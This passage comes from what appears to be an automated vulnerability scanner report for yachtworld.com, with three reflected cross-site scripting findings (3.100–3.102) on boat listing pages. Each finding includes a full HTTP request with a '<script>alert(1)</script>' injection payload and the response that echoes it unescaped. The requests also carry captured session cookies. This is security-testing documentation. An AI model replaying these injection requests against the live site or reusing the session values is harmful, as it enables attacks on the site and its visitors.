2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
f="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States833dd"><script>alert(1)</script>f4cd42b8d3c&boat_id=2305157">
...[SNIP]...

3.100. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28dc4"><script>alert(1)</script>1263c813c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States?28dc4"><script>alert(1)</script>1263c813c97=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:33 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:33 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&28dc4"><script>alert(1)</script>1263c813c97=1&units=Feet&seo=0&checked_boats=2305157&boat_id=2305157&back=/core/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States&boat_id=2305157">
...[SNIP]...

3.101. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37913"><script>alert(1)</script>074a64c253c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo37913"><script>alert(1)</script>074a64c253c/Puerto-Rico HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:20 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:20 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en-US">
<head>


               <t
...[SNIP]...
w" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo37913"><script>alert(1)</script>074a64c253c/Puerto-Rico&boat_id=2152119">
...[SNIP]...

3.102. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f752b"><script>alert(1)</script>40b5af5053c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Ricof752b"><script>alert(1)</script>40b5af5053c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; 
VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:17:13 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
